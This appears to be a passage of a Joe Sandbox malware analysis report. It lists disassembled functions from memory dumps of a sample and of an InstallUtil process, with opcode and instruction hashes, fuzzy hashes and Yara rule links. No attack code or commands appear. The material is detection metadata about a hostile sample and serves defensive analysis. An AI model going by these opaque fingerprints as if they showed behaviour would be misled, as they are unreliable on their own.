                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 06493db24e552032a5841ad26f814b3e9f2d6af462e761f1545a4a436df73b1b
                              • Instruction ID: c62242a6fe43a979d7b344f09684170c4bd22ba3f6023d6f904714a7de4edb4e
                              • Opcode Fuzzy Hash: 06493db24e552032a5841ad26f814b3e9f2d6af462e761f1545a4a436df73b1b
                              • Instruction Fuzzy Hash: B4210FB5D057588FE71ACF7B98142DABFB3AFC9200F08C0BBC408AB266DA3405458B61
                              Function 07B43C68 Relevance: .1, Instructions: 60COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 966b6365a4837ce9fbffc8c179b6d382e000ad3d54563ad25a1803c91baf6462
                              • Instruction ID: 52f6b6bcb6f639cb236853b05ffee0228031b520b21701705f629d8c95cc4eb3
                              • Opcode Fuzzy Hash: 966b6365a4837ce9fbffc8c179b6d382e000ad3d54563ad25a1803c91baf6462
                              • Instruction Fuzzy Hash: E7113DB1E11618CBDB59CF6BD9016EEFBF3AFC9200F18C06AD408A7255EA344A418B61
                              Function 0778B968 Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c9578c137d44239e647af4813f3a9f4994575b27cadd56d6968768e98e3ad00
                              • Instruction ID: 4d12f7f358605b7f759b8e670cd4a92a414398a5750b466e2122b4deec89d919
                              • Opcode Fuzzy Hash: 2c9578c137d44239e647af4813f3a9f4994575b27cadd56d6968768e98e3ad00
                              • Instruction Fuzzy Hash: 0721F1B1E016488BEB59CF6BD9446DEFBF3BFC9200F14C0B6C418A6265EB3416458F25
                              Function 012C70E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: \;_q$\;_q$\;_q$\;_q
                              • API String ID: 0-294077808
                              • Opcode ID: 3dc7c0b6f102d251341e554de8b7e5fcafa24062d660e438c36bf033d0b047f1
                              • Instruction ID: 42b04654489d317b1d511be41424fd3272114f41ae8507564d5f44fc28758616
                              • Opcode Fuzzy Hash: 3dc7c0b6f102d251341e554de8b7e5fcafa24062d660e438c36bf033d0b047f1
                              • Instruction Fuzzy Hash: 6D01B13176000A8F9BA88E2DC45492577EBBFC8E60B25426EE706CB374DAB1DC41CF80

                              Executed Functions

                              Function 011A25D4 Relevance: .5, Instructions: 510COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 05c4dc5415dd5783ced9cf7816155729e44b1514481862a27cd7adea35f40a0e
                              • Instruction ID: 0d4a1acd215e9f516cc7924556e07a63a68ff0702db184a84b5d1dca4e58b2ee
                              • Opcode Fuzzy Hash: 05c4dc5415dd5783ced9cf7816155729e44b1514481862a27cd7adea35f40a0e
                              • Instruction Fuzzy Hash: C5F0E0357001166BD705A77AF840F277BAAE7C9E60F044535E61DC3754DD246C1683A1
                              Function 011A0808 Relevance: .1, Instructions: 120COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4c886ffc4198e314a0e6c6e4a0d98e1d6ead67beb9d7d0ededdf9be9a64a48b3
                              • Instruction ID: 23cfbc055e9d5b7de3e7378bef171b6d0221211954e6b912a1d15aae3542c94c
                              • Opcode Fuzzy Hash: 4c886ffc4198e314a0e6c6e4a0d98e1d6ead67beb9d7d0ededdf9be9a64a48b3
                              • Instruction Fuzzy Hash: 06316E65E097E54FC70B977888A826D3F716F8E224F9901ADD1C1EB2B3D7244806C7A6
                              Function 011A1648 Relevance: .1, Instructions: 113COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ce443f27eef234c085b2ed99828d458dc07fcf6adef7cf5f454231d3acb97164
                              • Instruction ID: 63000cac134622b0f934bba291238e2f71ec18e2e0ae56b73f68c9f8d95f50ea
                              • Opcode Fuzzy Hash: ce443f27eef234c085b2ed99828d458dc07fcf6adef7cf5f454231d3acb97164
                              • Instruction Fuzzy Hash: 5E419238B002059FCB19EBB8D1447ADBFF2BF88304F588569D415AB355CB31AC46CB91
                              Function 011A1658 Relevance: .1, Instructions: 112COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 22fcc217eb59ce80ebf276d160bc1d8936615352afa62db8e2bf48c6dd5b824b
                              • Instruction ID: d84399747bbbbb9287f104f141cd1d5aac01e976ac02b5a453c98cf8a10d2eda
                              • Opcode Fuzzy Hash: 22fcc217eb59ce80ebf276d160bc1d8936615352afa62db8e2bf48c6dd5b824b
                              • Instruction Fuzzy Hash: 1B416038A002059FCB18EBA8D1446ADBFF2BF88314F548569D41AAB355CB31AC46CB91
                              Function 011A08DD Relevance: .1, Instructions: 66COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 68a6e031cb09f902b48dc126a3dbed4bde4e7a013a8903c7ebcb05fc4a94505a
                              • Instruction ID: a968fbe1edbaf7ecdd065e8eaa59370f9cc28269efbc95c61c9d74fa45f83500
                              • Opcode Fuzzy Hash: 68a6e031cb09f902b48dc126a3dbed4bde4e7a013a8903c7ebcb05fc4a94505a
                              • Instruction Fuzzy Hash: 70213B78B00116CFCB0CAB69846476E3AA2AF98744F914568E106AB7A4CF249D4687DA
                              Function 011A08E6 Relevance: .1, Instructions: 65COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6467d3d1b94ca62e7d35524e816191cfc47fac446387f1e425cc75f63ddac74
                              • Instruction ID: 59cfaf155519b61516a8545623a3976afe5c8cf31c7a42803aaf3a46fddc5e22
                              • Opcode Fuzzy Hash: f6467d3d1b94ca62e7d35524e816191cfc47fac446387f1e425cc75f63ddac74
                              • Instruction Fuzzy Hash: CD119D78B00116CFCB0CAB79C46463E3AA3BF98744F910568E106EB3A4CF349D4287DA
                              Function 011A08F9 Relevance: .1, Instructions: 62COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a22372af391712c1254d7e99f7eee6157f7480d8cddcc17cacf5fba8ea14dff
                              • Instruction ID: 0eb1d9f2b23365c2018ab80cec8d109f17218d4294c6ee30d9d6460f5e3a0762
                              • Opcode Fuzzy Hash: 2a22372af391712c1254d7e99f7eee6157f7480d8cddcc17cacf5fba8ea14dff
                              • Instruction Fuzzy Hash: 7B117F78B001168FCB0CAB79805466E2AA3AF98744F914568E506EB3A4CF249D0687D6
                              Function 011A14F7 Relevance: .1, Instructions: 53COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 108f1dd3a778aa7dfa61500b5ddef03e21c549a4bb7f4256184e20080989cc4b
                              • Instruction ID: f4872a667e794fecc5703cc7b4a36d7bebd2816fbee59a1f23333e0623da7c7c
                              • Opcode Fuzzy Hash: 108f1dd3a778aa7dfa61500b5ddef03e21c549a4bb7f4256184e20080989cc4b
                              • Instruction Fuzzy Hash: F01108629083915FC70B57B899601AA7FA5BE8312430D45ABC085DF563EF145C0AC7E2
                              Function 011A1CB0 Relevance: .0, Instructions: 47COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 23a0b4b73754463450a2c10b9cf286c343cb6fe80e690be58f5c3a88a94a80dc
                              • Instruction ID: d58bf21ef5ad56eb63c48aae17968f910b11a172fbcb5c22af2ba9cb2a9323d3
                              • Opcode Fuzzy Hash: 23a0b4b73754463450a2c10b9cf286c343cb6fe80e690be58f5c3a88a94a80dc
                              • Instruction Fuzzy Hash: 6901F2357003012BCB0AB66AB994A6F7B9AEBC5194340423DD505DF209EF60AC02C791
                              Function 011A0848 Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1e0641f6dcd77b5fc713896841c9656f8fe165b02dbe57403da163b2031cd681
                              • Instruction ID: 408a5fbbe183957b65ecf06938b9214f44f59afd214cea62c6b0371ffdc6bf2f
                              • Opcode Fuzzy Hash: 1e0641f6dcd77b5fc713896841c9656f8fe165b02dbe57403da163b2031cd681
                              • Instruction Fuzzy Hash: 2B017138B001158BDB5DAB79C4147AE7EB2BF8C304F910528E442B7394CF3498058BD6
                              Function 011A155A Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b8604e9ecdce61c8297b3cb0aed08aed9db6b5e858411ef92ed120ab02ff244
                              • Instruction ID: fbf3e1c823a6d661832806acca36b80896b073cd8d23b67a7ea48aaf0ad66625
                              • Opcode Fuzzy Hash: 7b8604e9ecdce61c8297b3cb0aed08aed9db6b5e858411ef92ed120ab02ff244
                              • Instruction Fuzzy Hash: 47012B219083911FC706577899201AB7FE6BFC312030945BFC086DF666EE186C0AC7D6
                              Function 011A1CC0 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 968800acf3f7f3f79ad030b1dd9bca369b31cc9161813cf082c02573bddc088d
                              • Instruction ID: aaae292a74f15f2e301652e263f259308adab74f50dcab0670c6c33fdd617d56
                              • Opcode Fuzzy Hash: 968800acf3f7f3f79ad030b1dd9bca369b31cc9161813cf082c02573bddc088d
                              • Instruction Fuzzy Hash: 22F0F4347002016BCA19BA6AB954A2F7B9AEBC4190340423DD405CF308EF30EC0287C0
                              Function 011A1752 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 04320cb7fabd68ca26e4254fc7071c11f196e854925a210d662e3ddbbca073a0
                              • Instruction ID: 1ec5f60bcd27a449f0557e60558df4cc3a8472323329e8a7843d9c845473bb96
                              • Opcode Fuzzy Hash: 04320cb7fabd68ca26e4254fc7071c11f196e854925a210d662e3ddbbca073a0
                              • Instruction Fuzzy Hash: 2701D1397002018FCB09E7B8E5806ADBBE3AFD4304F544529C417AB354DF75AC068B92
                              Function 011A0957 Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 291ece70a154c7354a5c46fcc151f337dcb539d12f665b92186c674bb750cff6
                              • Instruction ID: 6e19cc0a9e2d3948ab1bb8372388a8eb780c51033f1655f5fef2b42e0919ccc3
                              • Opcode Fuzzy Hash: 291ece70a154c7354a5c46fcc151f337dcb539d12f665b92186c674bb750cff6
                              • Instruction Fuzzy Hash: EAF08C78E10016CBCB4DAB69C45437E3EA2BF8C304FA10528E002AB390CF74890687D6
                              Function 011A17E8 Relevance: .0, Instructions: 30COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bededb9e451d6a51658c213d5ddd39378cd8c9caacd4268700902db29f309f48
                              • Instruction ID: 450006faf5f5fb85a9cd97a8bce94b040f056041d302afcf2886acf2f7c9ebe8
                              • Opcode Fuzzy Hash: bededb9e451d6a51658c213d5ddd39378cd8c9caacd4268700902db29f309f48
                              • Instruction Fuzzy Hash: 5CE0D8327152691FD70652AD78109BA3BAFE7CAB60B054577FA4AC7384DD644C0743E2
                              Function 011A29F8 Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 55169b972eef8b3101da577f9cae88621b5dd965313d42273f8cca59e4cc2f51
                              • Instruction ID: 6b88cfdf5b5bd6447bf8bee734f9e22324b463137ad5d0e5f3c9afa38a2736b4
                              • Opcode Fuzzy Hash: 55169b972eef8b3101da577f9cae88621b5dd965313d42273f8cca59e4cc2f51
                              • Instruction Fuzzy Hash: 62E0DF397100262BC214A2BDB440B7B73DBE7C8BA0F004535EA09C3344DE60AC1303E2
                              Function 011A1C30 Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 41434b786ced9ce16ad631a45246d435780cd213faa3dc3f94c662e29665cfc8
                              • Instruction ID: c6773f1fbdb603c76ad0a23d958d525cc7f2a8be7a08acbd5c6a2b5fb2759841
                              • Opcode Fuzzy Hash: 41434b786ced9ce16ad631a45246d435780cd213faa3dc3f94c662e29665cfc8
                              • Instruction Fuzzy Hash: CBF0EDB1C09268AFCB16DBB8EA912CDBBF0EB47608F0040BAC405EB215EA355E06C751
                              Function 011A1C50 Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.2629009590.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_11a0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90d1eac7df8d96ba53f1a2ffc4605e30c79e409d56924f06022a0c7bad9cccdf
                              • Instruction ID: d2b0e47cff2d75995062698212c5c56dac59d0034d2e215eaef8cb2e685bdc4d
                              • Opcode Fuzzy Hash: 90d1eac7df8d96ba53f1a2ffc4605e30c79e409d56924f06022a0c7bad9cccdf
                              • Instruction Fuzzy Hash: 37D01274901119EF8B14DFA9EA4155DB7F5EB45604B1041BDD809E7604DB311E009751